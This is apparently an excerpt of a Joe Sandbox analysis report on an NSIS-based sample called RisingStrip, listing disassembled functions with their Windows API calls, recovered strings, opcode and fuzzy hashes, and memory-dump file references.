Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
String ID:
API String ID: 2568930968-0
Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68

Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C

Strings

KaraokeQualification, xrefs: 00402770
<RM>, xrefs: 00402713
WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: PrivateProfileStringWritelstrcpyn
String ID: <RM>$KaraokeQualification$WriteINIStr: wrote [%s] %s=%s in %s
API String ID: 247603264-1756319533
Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD

Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
API String ID: 3156913733-2180253247
Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139

Function 00405E7F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00405E9D
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8

Strings

nsa, xrefs: 00405E8C

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798

Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 0040219F

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

EnableWindow.USER32(00000000,00000000), ref: 004021AA

Strings

HideWindow, xrefs: 0040218D

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: Window$EnableShowlstrlenwvsprintf
String ID: HideWindow
API String ID: 1249568736-780306582
Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D

Function 004078C5 Relevance: 5.2, APIs: 4, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85

Function 00407AC3 Relevance: 5.2, APIs: 4, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89

Function 00407312 Relevance: 5.2, APIs: 4, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86

Function 00407752 Relevance: 5.2, APIs: 4, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85

Function 00407854 Relevance: 5.2, APIs: 4, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86

Function 004077B2 Relevance: 5.2, APIs: 4, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86

Function 00407C5F Relevance: 5.2, APIs: 4, Instructions: 156memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNELBASE(?), ref: 004073C5
GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
GlobalFree.KERNELBASE(?), ref: 0040743D
GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: Global$AllocFree
String ID:
API String ID: 3394109436-0
Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85

Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E

Function 00405E50 Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15

Function 00405E30 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

